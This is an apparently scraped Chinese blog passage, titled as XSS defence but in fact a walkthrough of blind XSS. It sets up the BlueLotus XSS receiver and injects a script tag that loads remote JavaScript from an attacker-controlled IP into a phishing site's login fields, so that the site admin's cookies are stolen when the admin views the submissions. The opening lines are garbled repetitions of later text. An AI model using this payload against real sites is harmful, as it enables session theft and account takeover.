有效防御xss攻击的方法:XSS 攻击思路总结
有效防御xss攻击的方法:XSS 攻击思路总结Javascript然后使用 XSS 平台里面的模块来生成一个 XSS payload:官方项目地址为:https://github.com/firesunCN/BlueLotus_XSSReceiver可惜已经清空数据了,还好国光我 fork 了一份:国光 fork 的项目地址为:https://github.com/sqlsec/BlueLotus_XSSReceiver
然后钓鱼网站的管理员每天会到自己的 QQ 空间钓鱼管理中心里面看看今天又有哪些菜鸡上钩了:
可以看到上钩者的 QQ 号为:1314520 密码为:sbhac… 唉,不对劲?貌似自己被羞辱了一番……
攻击思路本文主要是来梳理一下 XSS 常见的攻击思路,关于 XSS 以为的思路不在本文的叙述范围内,另外如果有小伙伴要不错新的姿势的话欢迎评论区里面或者邮件留言,国光日后会继续完善本文的。
思路一:XSS 盲打如果目标网站存在 XSS 的话且没有 httponly 防御 Cookie 那么就可以直接盲打 XSS。首先准备一个 XSS 靶场,国光这里比较推荐 Github 上面开源的蓝莲花 XSS 平台。
官方项目地址为:https://github.com/firesunCN/BlueLotus_XSSReceiver
可惜已经清空数据了,还好国光我 fork 了一份:
国光 fork 的项目地址为:https://github.com/sqlsec/BlueLotus_XSSReceiver
然后使用 XSS 平台里面的模块来生成一个 XSS payload:
Javascript
<script src="http://10.20.24.244/xss/myjs/x.js"></script>
可以去掉多余的双引号:
Javascript
<script src=http://10.20.24.244/xss/myjs/x.js></script>
然后回到钓鱼网站前台,在用户名或者密码出插入 payload(理论上来说 密码处成功率要高一点),如果有表单长度限制的话,可以手工审查元素修改 input 的长度限制:
这样黑客攻击的步骤基本上就走完了,下面回到钓鱼网站管理员的视角。
钓鱼网站的搭建者到自己的 QQ 空间钓鱼管理中心里面看看今天又有哪些菜鸡上钩了:
发现真的有菜鸡上钩,密码居然是 1111111111 嘴角忍不住上仰。
此时他不知道的是,用户账号旁边实际上有一串 JS 代码被解析了,而此时黑客在 XSS 平台里面可以直接看到管理员已经上钩了: